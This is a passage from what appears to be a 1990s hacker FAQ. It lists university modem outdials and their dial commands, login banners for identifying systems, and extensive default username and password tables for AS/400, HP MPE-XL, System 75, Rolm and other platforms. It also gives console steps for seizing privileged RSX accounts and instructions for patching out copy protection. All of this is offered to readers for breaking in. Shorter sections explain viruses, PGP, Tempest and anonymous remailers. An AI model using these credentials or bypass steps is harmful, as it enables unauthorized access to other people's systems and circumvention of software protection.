  6748. 413          dialout2400.smith.edu        Ctrl } gets ENTER NUMBER: xxxxxxx
  6749.  
  6750. 502          outdial.louisville.edu
  6751.  
  6752. 502          uknet.uky.edu                connect kecnet
  6753.                                           @ dial: "outdial2400 or out"
  6754.  
  6755. 602          acssdial.inre.asu.edu        atdt8,,,,,[x][yyy]xxxyyyy
  6756.  
  6757. 614          ns2400.acs.ohio-state.edu
  6758.  
  6759. 614          ns9600.acs.ohio-state.edu
  6760.  
  6761. 713          128.249.27.153               atdt x,xxxXXXX
  6762.  
  6763. 714          modem.nts.uci.edu            atdt[area]0[phone]
  6764.  
  6765. 804          ublan.virginia.edu           connect hayes, 9,,xxx-xxxx
  6766.  
  6767. 804          ublan2.acc.virginia.edu      connect telnet
  6768.                                           connect hayes
  6769.  
  6770.  
  6771.  
  6772.                            Need Password
  6773.                -------------
  6774.  
  6775. 206          rexair.cac.washington.edu    This is an unbroken password
  6776. 303          yuma.ACNS.ColoState.EDU      login: modem
  6777. 404          128.140.1.239                .modem8|CR
  6778. 415          annex132-1.EECS.Berkeley.EDU "dial1" or "dial2" or "dialer1"
  6779. 514          cartier.CC.UMontreal.CA      externe,9+number
  6780. 703          wal-3000.cns.vt.edu          dial2400 -aa
  6781.  
  6782.  
  6783.                           Dead/No Connect
  6784.                           ---------------
  6785.  
  6786. 201          idsnet
  6787. 202          modem.aidt.edu
  6788. 204          dial.cc.umanitoba.ca
  6789. 204          umnet.cc.manitoba.ca         "dial12" or "dial24"
  6790. 206          dialout24.cac.washington.edu
  6791. 207          modem-o.caps.maine.edu
  6792. 212          B719-7e.NYU.EDU              dial3/dial12/dial24
  6793. 212          B719-7f.NYU.EDU              dial3/dial12/dial24
  6794. 212          DIALOUT-1.NYU.EDU            dial3/dial12/dial24
  6795. 212          FREE-138-229.NYU.EDU         dial3/dial12/dial24
  6796. 212          UP19-4b.NYU.EDU              dial3/dial12/dial24
  6797. 215          wiseowl.ocis.temple.edu      "atz" "atdt 9xxxyyyy"
  6798. 218          aa28.d.umn.edu               "cli" "rlogin modem"
  6799.                                           at "login:"  type "modem"
  6800. 218          modem.d.umn.edu              Hayes 9,XXX-XXXX
  6801. 301          dial9600.umd.edu
  6802. 305          alcat.library.nova.edu
  6803. 305          office.cis.ufl.edu
  6804. 307          modem.uwyo.edu               Hayes  0,XXX-XXXX
  6805. 313          35.1.1.6                     dial2400-aa or dial1200-aa
  6806.                                           or dialout
  6807. 402          dialin.creighton.edu
  6808. 402          modem.criegthon.edu
  6809. 404          broadband.cc.emory.edu       ".modem8" or ".dialout"
  6810. 408          dialout.scu.edu
  6811. 408          dialout1200.scu.edu
  6812. 408          dialout2400.scu.edu
  6813. 408          dialout9600.scu.edu
  6814. 413          dialout.smith.edu
  6815. 414          modems.uwp.edu
  6816. 416          annex132.berkely.edu         atdt 9,,,,, xxx-xxxx
  6817. 416          pacx.utcs.utoronto.ca        modem
  6818. 503          dialout.uvm.edu
  6819. 513          dialout24.afit.af.mil
  6820. 513          r596adi1.uc.edu
  6821. 514          pacx.CC.UMontreal.CA         externe#9 9xxx-xxxx
  6822. 517          engdial.cl.msu.edu
  6823. 602          dial9600.telcom.arizona.edu
  6824. 603          dialout1200.unh.edu
  6825. 604          dial24-nc00.net.ubc.ca
  6826. 604          dial24-nc01.net.ubc.ca
  6827. 604          dial96-np65.net.ubc.ca
  6828. 604          gmodem.capcollege.bc.ca
  6829. 604          hmodem.capcollege.bc.ca
  6830. 609          128.119.131.11X (X= 1 - 4)   Hayes
  6831. 609          129.119.131.11x  (x = 1 to 4)
  6832. 609          wright-modem-1.rutgers.edu
  6833. 609          wright-modem-2.rutgers.edu
  6834. 612          modem_out12e7.atk.com
  6835. 612          modem_out24n8.atk.com
  6836. 614          ns2400.ircc.ohio-state.edu   "dial"
  6837. 615          dca.utk.edu                  dial2400 D 99k #
  6838. 615          MATHSUN23.MATH.UTK.EDU       dial 2400  d  99Kxxxxxxx
  6839. 616          modem.calvin.edu
  6840. 617          128.52.30.3                  2400baud
  6841. 617          dialout.lcs.mit.edu
  6842. 617          dialout1.princeton.edu
  6843. 617          isdn3.Princeton.EDU
  6844. 617          jadwingymkip0.Princeton.EDU
  6845. 617          lord-stanley.Princeton.EDU
  6846. 617          mpanus.Princeton.EDU
  6847. 617          mrmodem.wellesley.edu
  6848. 617          old-dialout.Princeton.EDU
  6849. 617          stagger.Princeton.EDU
  6850. 617          sunshine-02.lcs.mit.edu
  6851. 617          waddle.Princeton.EDU
  6852. 619          128.54.30.1                  atdt [area][phone]
  6853. 619          dialin.ucsd.edu              "dialout"
  6854. 703          modem_pool.runet.edu
  6855. 703          wal-3000.cns.vt.edu
  6856. 713          128.249.27.154               "c modem96"  "atdt 9xxx-xxxx"
  6857.                                           or "Hayes"
  6858. 713          modem12.bcm.tmc.edu
  6859. 713          modem24.bcm.tmc.edu
  6860. 713          modem24.bcm.tmc.edu
  6861. 714          mdmsrv7.sdsu.edu             atdt 8xxx-xxxx
  6862. 714          modem24.nts.uci.edu
  6863. 714          pub-gopher.cwis.uci.edu
  6864. 801          dswitch.byu.edu              "C Modem"
  6865. 808          irmodem.ifa.hawaii.edu
  6866. 902          star.ccs.tuns.ca             "dialout"
  6867. 916          129.137.33.72
  6868. 916          cc-dnet.ucdavis.edu          connect hayes/dialout
  6869. 916          engr-dnet1.engr.ucdavis.edu  UCDNET <ret> C KEYCLUB <ret>
  6870. ???          128.119.131.11X              (1 - 4)
  6871. ???          128.200.142.5
  6872. ???          128.54.30.1                  nue, X to discontinue, ? for Help
  6873. ???          128.6.1.41
  6874. ???          128.6.1.42
  6875. ???          129.137.33.72
  6876. ???          129.180.1.57
  6877. ???          140.112.3.2                  ntu            <none>
  6878. ???          annexdial.rz.uni-duesseldorf.de
  6879. ???          dial96.ncl.ac.uk
  6880. ???          dialout.plk.af.mil
  6881. ???          ee21.ee.ncu.edu.tw           cs8005
  6882. ???          im.mgt.ncu.edu.tw            guest           <none>
  6883. ???          modem.cis.uflu.edu
  6884. ???          modem.ireq.hydro.qc.ca
  6885. ???          modems.csuohio.edu
  6886. ???          sparc20.ncu.edu.tw           u349633
  6887. ???          sun2cc.nccu.edu.tw           ?
  6888. ???          ts-modem.une.oz.au
  6889. ???          twncu865.ncu.edu.tw          guest           <none>
  6890. ???          vtnet1.cns.ut.edu            "CALL" or "call"
  6891.  
  6892.  
  6893. Conclusion
  6894. ----------
  6895. If you find any of the outdials to have gone dead, changed commands,
  6896. or require password, please let us know so we can keep this list as
  6897. accurate as possible. If you would like to add to the list, feel free
  6898. to mail us and it will be included in future versions of this list,
  6899. with your name beside it. Have fun...
  6900.  
  6901. [Editors note: Updates have been made to this document after
  6902.                the original publication]
  6903.  
  6904.  
  6905. 20. What is this system?
  6906.  
  6907.  
  6908. AIX
  6909. ~~~
  6910. IBM AIX Version 3 for RISC System/6000
  6911. (C) Copyrights by IBM and by others 1982, 1990.
  6912. login:
  6913.  
  6914. [You will know an AIX system because it is the only Unix system that]
  6915. [clears the screen and issues a login prompt near the bottom of the]
  6916. [screen]
  6917.  
  6918.  
  6919. AS/400
  6920. ~~~~~~
  6921. UserID?
  6922. Password?
  6923.  
  6924. Once in, type GO MAIN
  6925.  
  6926.  
  6927. CDC Cyber
  6928. ~~~~~~~~~
  6929. WELCOME TO THE NOS SOFTWARE SYSTEM.
  6930. COPYRIGHT CONTROL DATA 1978, 1987.
  6931.  
  6932. 88/02/16. 02.36.53. N265100
  6933. CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
  6934. FAMILY:
  6935.  
  6936. You would normally just hit return at the family prompt.  Next prompt is:
  6937.  
  6938. USER NAME:
  6939.  
  6940.  
  6941. CISCO Router
  6942. ~~~~~~~~~~~~
  6943.                              FIRST BANK OF TNO
  6944.                            95-866 TNO VirtualBank
  6945.                           REMOTE Router -  TN043R1
  6946.  
  6947.                                 Console Port
  6948.  
  6949.                                 SN - 00000866
  6950.  
  6951. TN043R1>
  6952.  
  6953.  
  6954. DECserver
  6955. ~~~~~~~~~
  6956. DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1
  6957. DPS502-DS700
  6958.  
  6959. (c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved
  6960.  
  6961. Please type HELP if you need assistance
  6962.  
  6963. Enter username> TNO
  6964.  
  6965. Local>
  6966.  
  6967.  
  6968. Hewlett Packard MPE-XL
  6969. ~~~~~~~~~~~~~~~~~~~~~~
  6970. MPE XL:
  6971. EXPECTED A :HELLO COMMAND. (CIERR 6057)
  6972. MPE XL:
  6973. EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)
  6974. MPE XL:
  6975.  
  6976.  
  6977. GTN
  6978. ~~~
  6979. WELCOME TO CITIBANK. PLEASE SIGN ON.
  6980. XXXXXXXX
  6981.  
  6982. @
  6983. PASSWORD =
  6984.  
  6985. @
  6986.  
  6987. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  6988.  
  6989. PLEASE ENTER YOUR ID:-1->
  6990. PLEASE ENTER YOUR PASSWORD:-2->
  6991.  
  6992. CITICORP (CITY NAME). KEY GHELP FOR HELP.
  6993.   XXX.XXX
  6994.  PLEASE SELECT SERVICE REQUIRED.-3->
  6995.  
  6996.  
  6997. Lantronix Terminal Server
  6998. ~~~~~~~~~~~~~~~~~~~~~~~~~
  6999. Lantronix ETS16 Version V3.1/1(940623)
  7000.  
  7001. Type HELP at the 'Local_15> ' prompt for assistance.
  7002.  
  7003. Login password>
  7004.  
  7005.  
  7006. Meridian Mail (Northern Telecom Phone/Voice Mail System)
  7007. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7008.                             MMM       MMMERIDIAN
  7009.                            MMMMM     MMMMM
  7010.                          MMMMMM   MMMMMM
  7011.                         MMM  MMMMM  MMM     MMMMM     MMMMM
  7012.                       MMM   MMM   MMM     MMMMMM   MMMMMM
  7013.                      MMM         MMM     MMM MMM MMM MMM
  7014.                     MMM         MMM     MMM  MMMMM  MMM
  7015.                    MMM         MMM     MMM   MMM   MMM
  7016.                   MMM         MMM     MMM         MMM
  7017.                  MMM         MMM     MMM         MMM
  7018.                 MMM         MMM     MMM         MMM
  7019.                MMM         MMM     MMM         MMM
  7020.               MMM         MMM     MMM         MMM
  7021.  
  7022.                                           Copyright (c) Northern Telecom, 1991
  7023.  
  7024.  
  7025. Novell ONLAN
  7026. ~~~~~~~~~~~~
  7027. N
  7028.  
  7029. [To access the systems it is best to own a copy of ONLAN/PC]
  7030.  
  7031.  
  7032. PC-Anywhere
  7033. ~~~~~~~~~~~
  7034. P
  7035.  
  7036. [To access the systems it is best to own a copy of PCAnywhere Remote]
  7037.  
  7038.  
  7039. PRIMOS
  7040. ~~~~~~
  7041. PRIMENET 19.2.7F PPOA1
  7042.  
  7043. <any text>
  7044.  
  7045. ER!
  7046.  
  7047. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  7048.  
  7049. CONNECT
  7050. Primenet V 2.3  (system)
  7051. LOGIN           (you)
  7052. User id?        (system)
  7053. SAPB5           (you)
  7054. Password?       (system)
  7055. DROWSAP         (you)
  7056. OK,             (system)
  7057.  
  7058.  
  7059. ROLM-OSL
  7060. ~~~~~~~~
  7061. MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
  7062. RELEASE 8003
  7063. OSL, PLEASE.
  7064. ?
  7065.  
  7066.  
  7067. System75
  7068. ~~~~~~~~
  7069. Login: root
  7070. INCORRECT LOGIN
  7071.  
  7072. Login: browse
  7073. Password:
  7074.  
  7075. Software Version: G3s.b16.2.2
  7076.  
  7077. Terminal Type (513, 4410, 4425): [513]
  7078.  
  7079.  
  7080. Tops-10
  7081. ~~~~~~~
  7082. NIH Timesharing
  7083.  
  7084. NIH Tri-SMP 7.02-FF  16:30:04 TTY11
  7085. system 1378/1381/1453 Connected to Node Happy(40) Line # 12
  7086. Please LOGIN
  7087. .
  7088.  
  7089.  
  7090. VM/370
  7091. ~~~~~~
  7092. VM/370
  7093. !
  7094.  
  7095.  
  7096. VM/ESA
  7097. ~~~~~~
  7098. VM/ESA ONLINE
  7099.  
  7100.                                           TBVM2 VM/ESA Rel 1.1     PUT 9200
  7101.  
  7102. Fill in your USERID and PASSWORD and press ENTER
  7103. (Your password will not appear when you type it)
  7104. USERID   ===>
  7105. PASSWORD ===>
  7106.  
  7107. COMMAND  ===>
  7108.  
  7109.  
  7110. Xylogics Annex Communications Server
  7111. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7112. Annex Command Line Interpreter   *   Copyright 1991 Xylogics, Inc.
  7113.  
  7114. Checking authorization, Please wait...
  7115. Annex username: TNO
  7116. Annex password:
  7117.  
  7118. Permission granted
  7119. annex:
  7120.  
  7121.  
  7122. 21. What are the default accounts for XXX?
  7123.  
  7124. AIX
  7125. ~~~
  7126. guest           guest
  7127.  
  7128.  
  7129. AS/400
  7130. ~~~~~~
  7131. qsecofr         qsecofr         /* master security officer */
  7132. qsysopr         qsysopr         /* system operator         */
  7133. qpgmr           qpgmr           /* default programmer      */
  7134.  
  7135. also
  7136.  
  7137. ibm/password
  7138. ibm/2222
  7139. ibm/service
  7140. qsecofr/1111111
  7141. qsecofr/2222222
  7142. qsvr/qsvr
  7143. secofr/secofr
  7144.  
  7145.  
  7146. DECserver
  7147. ~~~~~~~~~
  7148. ACCESS
  7149. SYSTEM
  7150.  
  7151.  
  7152. Dynix (The library software, not the UnixOS)
  7153. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7154. (Type 'later' to exit to the login prompt)
  7155. setup           <no password>
  7156. library         <no password>
  7157. circ            <9 digit number>
  7158.  
  7159.  
  7160. Hewlett Packard MPE-XL
  7161. ~~~~~~~~~~~~~~~~~~~~~~
  7162. HELLO           MANAGER.SYS
  7163. HELLO           MGR.SYS
  7164. HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP
  7165. HELLO           OP.OPERATOR
  7166. MGR             CAROLIAN
  7167. MGR             CCC
  7168. MGR             CNAS
  7169. MGR             CONV
  7170. MGR             COGNOS
  7171. OPERATOR        COGNOS
  7172. MANAGER         COGNOS
  7173. OPERATOR        DISC
  7174. MGR             HPDESK
  7175. MGR             HPWORD
  7176. FIELD           HPWORD
  7177. MGR             HPOFFICE
  7178. SPOOLMAN        HPOFFICE
  7179. ADVMAIL         HPOFFICE
  7180. MAIL            HPOFFICE
  7181. WP              HPOFFICE
  7182. MANAGER         HPOFFICE
  7183. MGR             HPONLY
  7184. FIELD           HPP187
  7185. MGR             HPP187
  7186. MGR             HPP189
  7187. MGR             HPP196
  7188. MGR             INTX3
  7189. MGR             ITF3000
  7190. MANAGER         ITF3000
  7191. MAIL            MAIL
  7192. MGR             NETBASE
  7193. MGR             REGO
  7194. MGR             RJE
  7195. MGR             ROBELLE
  7196. MANAGER         SECURITY
  7197. MGR             SECURITY
  7198. FIELD           SERVICE
  7199. MANAGER         SYS
  7200. MGR             SYS
  7201. PCUSER          SYS
  7202. RSBCMON         SYS
  7203. OPERATOR        SYS
  7204. OPERATOR        SYSTEM
  7205. FIELD           SUPPORT
  7206. OPERATOR        SUPPORT
  7207. MANAGER         TCH
  7208. MAIL            TELESUP
  7209. MANAGER         TELESUP
  7210. MGR             TELESUP
  7211. SYS             TELESUP
  7212. MGE             VESOFT
  7213. MGE             VESOFT
  7214. MGR             WORD
  7215. MGR             XLSERVER
  7216.  
  7217. Common jobs are Pub, Sys, Data
  7218. Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote
  7219.  
  7220.  
  7221. Major BBS
  7222. ~~~~~~~~~
  7223. Sysop           Sysop
  7224.  
  7225.  
  7226. Mitel PBX
  7227. ~~~~~~~~~
  7228. SYSTEM
  7229.  
  7230.  
  7231. Nomadic Computing Environment (NCE) on the Tadpole Technologies SPARCBook3
  7232. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7233. fax             <no password>
  7234.  
  7235.  
  7236. PICK O/S
  7237. ~~~~~~~~
  7238. DSA             # Desquetop System Administrator
  7239. DS
  7240. DESQUETOP
  7241. PHANTOM
  7242.  
  7243.  
  7244. Prolog
  7245. ~~~~~~
  7246. PBX             PBX
  7247. NETWORK         NETWORK
  7248. NETOP           <null>
  7249.  
  7250.  
  7251. Rolm
  7252. ~~~~
  7253. CBX Defaults
  7254.  
  7255. op              op
  7256. op              operator
  7257. su              super
  7258. admin           pwp
  7259. eng             engineer
  7260.  
  7261.  
  7262. PhoneMail Defaults
  7263.  
  7264. sysadmin        sysadmin
  7265. tech            tech
  7266. poll            tech
  7267.  
  7268.  
  7269. RSX
  7270. ~~~
  7271. SYSTEM/SYSTEM   (Username SYSTEM, Password SYSTEM)
  7272. 1,1/system      (Directory [1,1] Password SYSTEM)
  7273. BATCH/BATCH
  7274. SYSTEM/MANAGER
  7275. USER/USER
  7276.  
  7277. Default accounts for Micro/RSX:
  7278.  
  7279.         MICRO/RSX
  7280.  
  7281. Alternately you can hit <CTRL-Z>  when the boot sequence asks you for the
  7282. date and create an account using:
  7283.  
  7284.         RUN ACNT
  7285.         or  RUN $ACNT
  7286.  
  7287. (Numbers below 10 {oct} are Priveleged)
  7288.  
  7289. Reboot and wait for the date/time question. Type ^C and at the MCR prompt,
  7290. type "abo at." You must include the . dot!
  7291.  
  7292. If this works, type "acs lb0:/blks=1000" to get some swap space so the
  7293. new step won't wedge.
  7294.  
  7295. type " run $acnt" and change the password of any account with a group
  7296. number of 7 or less.
  7297.  
  7298. You may find that the ^C does not work. Try ^Z and ESC as well.
  7299. Also try all 3 as terminators to valid and invalid times.
  7300.  
  7301. If none of the above work, use the halt switch to halt the system,
  7302. just after a invalid date-time.  Look for a user mode PSW 1[4-7]xxxx.
  7303. then deposit 177777 into R6, cross your fingers, write protect the drive
  7304. and continue the system.  This will hopefully result in indirect blowing
  7305. up...  And hopefully the system has not been fully secured.
  7306.  
  7307.  
  7308. SGI Irix
  7309. ~~~~~~~~
  7310. 4DGifts         <no password>
  7311. guest           <no password>
  7312. demos           <no password>
  7313. lp              <no password>
  7314. nuucp           <no password>
  7315. tour            <no password>
  7316. tutor           <no password>
  7317.  
  7318.  
  7319. System 75
  7320. ~~~~~~~~~
  7321. bcim            bcimpw
  7322. bciim           bciimpw
  7323. bcms            bcmspw, bcms
  7324. bcnas           bcnspw
  7325. blue            bluepw
  7326. browse          looker, browsepw
  7327. craft           crftpw, craftpw, crack
  7328. cust            custpw
  7329. enquiry         enquirypw
  7330. field           support
  7331. inads           indspw, inadspw, inads
  7332. init            initpw
  7333. kraft           kraftpw
  7334. locate          locatepw
  7335. maint           maintpw, rwmaint
  7336. nms             nmspw
  7337. rcust           rcustpw
  7338. support         supportpw
  7339. tech            field
  7340.  
  7341.  
  7342. Taco Bell
  7343. ~~~~~~~~~
  7344. rgm             rollout
  7345. tacobell        <null>
  7346.  
  7347.           
  7348. Verifone Junior 2.05
  7349. ~~~~~~~~~~~~~~~~~~~~
  7350. Default password: 166816
  7351.  
  7352.  
  7353. VMS
  7354. ~~~
  7355. field           service
  7356. systest         utep
  7357.  
  7358.  
  7359. XON / XON Junior
  7360. ~~~~~~~~~~~~~~~~
  7361. Default password: 166831
  7362.  
  7363.  
  7364. 22. What port is XXX on?
  7365.  
  7366. The file /etc/services on most Unix machines lists the port
  7367. assignments for that machine.  For a complete list of port
  7368. assignments, read RFC (Request For Comments) 1700 "Assigned Numbers"
  7369.  
  7370.  
  7371. 23.  What is a trojan/worm/virus/logic bomb?
  7372.  
  7373. This FAQ answer was written by Theora:
  7374.  
  7375. Trojan:
  7376.  
  7377. Remember the Trojan Horse?  Bad guys hid inside it until they could
  7378. get into the city to do their evil deed.  A trojan computer program is
  7379. similar.  It is a program which does an unauthorized function, hidden
  7380. inside an authorized program.  It does something other than what it
  7381. claims to do, usually something malicious (although not necessarily!),
  7382. and it is intended by the author to do whatever it does.  If it's not
  7383. intentional, its called a 'bug' or, in some cases, a feature :) Some
  7384. virus scanning programs detect some trojans.  Some virus scanning
  7385. programs don't detect any trojans.  No virus scanners detect all
  7386. trojans.
  7387.  
  7388. Virus:
  7389.  
  7390. A virus is an independent program which reproduces itself.  It may
  7391. attach to other programs, it may create copies of itself (as in
  7392. companion viruses).  It may damage or corrupt data, change data, or
  7393. degrade the performance of your system by utilizing resources such as
  7394. memory or disk space.  Some virus scanners detect some viruses.  No
  7395. virus scanners detect all viruses.  No virus scanner can protect
  7396. against "any and all viruses, known and unknown, now and forevermore".
  7397.  
  7398. Worm:
  7399.  
  7400. Made famous by Robert Morris, Jr. , worms are programs which reproduce
  7401. by copying themselves over and over, system to system, using up
  7402. resources and sometimes slowing down the systems.  They are self
  7403. contained and use the networks to spread, in much the same way viruses
  7404. use files to spread.  Some people say the solution to viruses and
  7405. worms is to just not have any files or networks.  They are probably
  7406. correct.  We would include computers.
  7407.  
  7408. Logic Bomb:
  7409.  
  7410. Code which will trigger a particular form of 'attack' when a
  7411. designated condition is met.  For instance, a logic bomb could delete
  7412. all files on Dec.  5th.  Unlike a virus, a logic bomb does not make
  7413. copies of itself.
  7414.  
  7415.  
  7416. 24.  How can I protect myself from viruses and such?
  7417.  
  7418. This FAQ answer was written by Theora:
  7419.  
  7420. The most common viruses are boot sector infectors.  You can help
  7421. protect yourself against those by write protecting all disks which you
  7422. do not need write access to.  Definitely keep a set of write protected
  7423. floppy system disks.  If you get a virus, it will make things much
  7424. simpler.  And, they are good for coasters.  Only kidding.
  7425.  
  7426. Scan all incoming files with a recent copy of a good virus scanner.
  7427. Among the best are F-Prot, Dr.  Solomon's Anti-virus Toolkit, and
  7428. Thunderbyte Anti-Virus.  AVP is also a good proggie.  Using more than
  7429. one scanner could be helpful.  You may get those one or two viruses
  7430. that the other guy happened to miss this month.
  7431.  
  7432. New viruses come out at the rate of about 8 per day now.  NO scanner
  7433. can keep up with them all, but the four mentioned here do the best job
  7434. of keeping current.  Any _good_ scanner will detect the majority of
  7435. common viruses.  No virus scanner will detect all viruses.
  7436.  
  7437. Right now there are about 5600 known viruses.  New ones are written
  7438. all the time.  If you use a scanner for virus detection, you need to
  7439. make sure you get frequent updates.  If you rely on behaviour
  7440. blockers, you should know that such programs can be bypassed easily by
  7441. a technique known as tunnelling.
  7442.  
  7443. You may want to use integrity checkers as well as scanners.  Keep in
  7444. mind that while these can supply added protection, they are not
  7445. foolproof.
  7446.  
  7447. You may want to use a particular kind of scanner, called resident
  7448. scanners.  Those are programs which stay resident in the computer
  7449. memory and constantly monitor program execution (and sometimes even
  7450. access to the files containing programs).  If you try to execute a
  7451. program, the resident scanner receives control and scans it first for
  7452. known viruses.  Only if no such viruses are found, the program is
  7453. allowed to execute.
  7454.  
  7455. Most virus scanners will not protect you against many kinds of
  7456. trojans, any sort of logic bombs, or worms.  Theoretically, they
  7457. _could_ protect you against logic bombs and/or worms, by addition of
  7458. scanning strings; however, this is rarely done.
  7459.  
  7460. The best, actually only way, to protect yourself is to know what you
  7461. have on your system and make sure what you have there is authorised by
  7462. you.  Make freqent backups of all important files.  Keep your DOS
  7463. system files write protected.  Write protect all disks that you do not
  7464. need to write to.  If you do get a virus, don't panic.  Call the
  7465. support department of the company who supplies your anti-virus product
  7466. if you aren't sure of what you are doing.  If the company you got your
  7467. anti-virus software from does not have a good technical support
  7468. department, change companies.
  7469.  
  7470. The best way to make sure viruses are not spread is not to spread
  7471. them.  Some people do this intentionally.  We discourage this. Viruses
  7472. aren't cool.
  7473.  
  7474.  
  7475. 25.  Where can I get more information about viruses?
  7476.  
  7477. This FAQ answer was written by Theora:
  7478.  
  7479. Assembly lanaguage programming books illustrate the (boring) aspect of
  7480. replication and have for a long time.  The most exciting/interesting
  7481. thing about viruses is all the controversy around them.  Free speech,
  7482. legality, and cute payloads are a lot more interesting than "find
  7483. first, find next" calls.  You can get information about the technical
  7484. aspects of viruses, as well as help if you should happen to get a
  7485. virus, from the virus-l FAQ, posted on comp. virus every so often.
  7486. You can also pick up on the various debates there.  There are
  7487. alt.virus type newsgroups, but the level of technical expertise is
  7488. minimal, and so far at least there has not been a lot of real "help"
  7489. for people who want to get -rid- of a virus.
  7490.  
  7491. There are a lot of virus experts.  To become one, just call yourself
  7492. one.  Only Kidding.  Understanding viruses involves understanding
  7493. programming, operating systems, and their interaction.  Understanding
  7494. all of the 'Cult of Virus' business requires a lot of discernment.
  7495. There are a number of good papers available on viruses, and the Cult
  7496. of Virus; you can get information on them from just about anyone
  7497. listed in the virus-l FAQ.  The FTP site ftp.informatik.uni-hamburg.de
  7498. is a pretty reliable site for proggies and text.
  7499.  
  7500.  
  7501. 26. What is Cryptoxxxxxxx?
  7502.  
  7503. This FAQ answer is excerpted from: Computer Security Basics
  7504.                                    by Deborah Russell
  7505.                                    and G.T. Gengemi Sr.
  7506.  
  7507. A message is called either plaintext or cleartext.  The process of
  7508. disguising a message in such a way as to hide its substance is called
  7509. encryption.  An encrypted message is called ciphertext.  The process
  7510. of turning ciphertext back into plaintext is called decryption.
  7511.  
  7512. The art and science of keeping messages secure is called cryptography,
  7513. and it is practiced by cryptographers.  Cryptanalysts are
  7514. practitioners of cryptanalysis, the art and science of breaking
  7515. ciphertext, i.e. seeing through the disguise.  The branch of
  7516. mathematics embodying both cryptography and cryptanalysis is called
  7517. cryptology, and it's practitioners are called cryptologists.
  7518.  
  7519.  
  7520. 27. What is PGP?
  7521.  
  7522. This FAQ answer is excerpted from: PGP(tm) User's Guide
  7523.                                    Volume I: Essential Topics
  7524.                                    by Philip Zimmermann
  7525.  
  7526. PGP(tm) uses public-key encryption to protect E-mail and data files.
  7527. Communicate securely with people you've never met, with no secure
  7528. channels needed for prior exchange of keys.  PGP is well featured and
  7529. fast, with sophisticated key management, digital signatures, data
  7530. compression, and good ergonomic design.
  7531.  
  7532. Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
  7533. high security cryptographic software application for MS-DOS, Unix,
  7534. VAX/VMS, and other computers.  PGP allows people to exchange files or
  7535. messages with privacy, authentication, and convenience.  Privacy means
  7536. that only those intended to receive a message can read it.
  7537. Authentication means that messages that appear to be from a particular
  7538. person can only have originated from that person. Convenience means
  7539. that privacy and authentication are provided without the hassles of
  7540. managing keys associated with conventional cryptographic software.  No
  7541. secure channels are needed to exchange keys between users, which makes
  7542. PGP much easier to use.  This is because PGP is based on a powerful
  7543. new technology called "public key" cryptography.
  7544.  
  7545. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
  7546. public key cryptosystem with the speed of conventional cryptography,
  7547. message digests for digital signatures, data compression before
  7548. encryption, good ergonomic design, and sophisticated key management. 
  7549. And PGP performs the public-key functions faster than most other
  7550. software implementations.  PGP is public key cryptography for the
  7551. masses.
  7552.  
  7553.  
  7554. 28. What is Tempest?
  7555.  
  7556. Tempest stands for Transient Electromagnetic Pulse Surveillance
  7557. Technology.
  7558.  
  7559. Computers and other electronic equipment release interference to their
  7560. surrounding environment.  You may observe this by placing two video
  7561. monitors close together.  The pictures will behave erratically until
  7562. you space them apart.
  7563.  
  7564. Although most of the time these emissions are simply annoyances, they
  7565. can sometimes be very helpful.  Suppose we wanted to see what project
  7566. a target was working on.  We could sit in a van outside her office and
  7567. use sensitive electronic equipment to attempt to pick up and decipher
  7568. the emanations from her video monitor.
  7569.  
  7570. Our competitor, however, could shield the emanations from her
  7571. equipment or use equipment without strong emanations.
  7572.  
  7573. Tempest is the US Government program for evaluation and endorsement
  7574. of electronic equipment that is safe from eavesdropping.
  7575.  
  7576.  
  7577. 29. What is an anonymous remailer?
  7578.  
  7579. An anonymous remailer is a system on the Internet that allows you to
  7580. send e-mail anonymously or post messages to Usenet anonymously.
  7581.  
  7582. You apply for an anonymous ID at the remailer site.  Then, when you
  7583. send a message to the remailer, it sends it out from your anonymous ID
  7584. at the remailer.  No one reading the post will know your real account
  7585. name or host name.  If someone sends a message to your anonymous ID,
  7586. it will be forwarded to your real account by the remailer.
  7587.  
  7588.  
  7589. 30. What are the addresses of some anonymous remailers?
  7590.  
  7591. The most popular and stable anonymous remailer is anon.penet.fi,
  7592. operated by Johan Helsingus.  To obtain an anonymous ID, mail
  7593. ping@anon.penet.fi.  For assistance is obtaining an anonymous account
  7594. at penet, mail help@anon.penet.fi.
  7595.  
  7596. To see a list on anonymous remailers, finger
  7597. remailer-list@kiwi.cs.berkeley.edu.
  7598.  
  7599.  
  7600. 31. How do I defeat Copy Protection?
  7601.  
  7602. There are two common methods of defeating copy protection.  The first
  7603. is to use a program that removes copy protection.  Popular programs
  7604. that do this are CopyIIPC from Central Point Software and CopyWrite
  7605. from Quaid Software.  The second method involves patching the copy
  7606. protected program.  For popular software, you may be able to locate a
  7607. ready made patch.  You can them apply the patch using any hex editor,
  7608. such as debug or the Peter Norton's DiskEdit.  If you cannot, you must
  7609. patch the software yourself.
  7610.  
  7611. Writing a patch requires a debugger, such as Soft-Ice or Sourcer.  It
  7612. also requires some knowledge of assembly language.  Load the protected
  7613. program under the debugger and watch for it to check the protection
  7614. mechanism.  When it does, change that portion of the code.  The code
  7615. can be changed from JE (Jump on Equal) or JNE (Jump On Not Equal) to
  7616. JMP (Jump Unconditionally).  Or the code may simply be replaced with
  7617. NOP (No Operation) instructions.
  7618.  
  7619.  
  7620. 32. What is 127.0.0.1?
  7621.  
  7622. 127.0.0.1 is a loopback network connection.  If you telnet, ftp, etc...
  7623. to it you are connected to your own machine.
  7624.  
  7625.  
  7626. 33. How do I post to a moderated newsgroup?
  7627.  
